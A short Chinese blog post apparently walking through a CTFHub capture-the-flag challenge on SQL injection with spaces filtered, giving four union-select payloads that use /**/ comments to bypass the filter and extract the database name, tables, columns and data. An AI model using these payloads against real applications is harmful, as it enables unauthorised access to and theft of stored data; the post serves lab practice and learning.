CTFHUB-SQL注入-过滤空格

燕雀安知鸿鹄之志哉.2024-08-15 10:09

目录

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据

空格被过滤,使用 /**/ 绕过

查询数据库名

-1/**/union/**/select/**/1,database()

查询数据库中的表

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg
相关推荐
小菜yh10 分钟前
关于Redis
java·数据库·spring boot·redis·spring·缓存
Microsoft Word30 分钟前
数据库系统原理(第一章 数据库概述)
数据库·oracle
云卓科技37 分钟前
无人机之控制距离篇
科技·安全·机器人·无人机·制造
云卓科技39 分钟前
无人机之飞行高度篇
科技·安全·机器人·无人机·制造
华为云开源40 分钟前
openGemini 社区人才培养计划:助力成长,培养新一代云原生数据库人才
数据库·云原生·开源
qmx_073 小时前
HTB-Jerry(tomcat war文件、msfvenom)
java·web安全·网络安全·tomcat
小安运维日记3 小时前
Linux云计算 |【第四阶段】NOSQL-DAY1
linux·运维·redis·sql·云计算·nosql
kejijianwen4 小时前
JdbcTemplate常用方法一览AG网页参数绑定与数据寻址实操
服务器·数据库·oracle
编程零零七4 小时前
Python数据分析工具(三):pymssql的用法
开发语言·前端·数据库·python·oracle·数据分析·pymssql
GEEKVIP5 小时前
Android 恢复挑战和解决方案:如何从 Android 设备恢复删除的文件
android·笔记·安全·macos·智能手机·电脑·笔记本电脑
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02组基轨迹建模 GBTM的介绍与实现(Stata 或 R)032024年高教社杯数学建模国赛C题超详细解题思路分析04Coze扣子平台完整体验和实践(附国内和国际版对比)05苍穹外卖面试总结06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提07yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)08CCF-CSP认证考试 202406-3 文本分词 100分题解09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文10浏览器插件——ModHeader 的分享和学习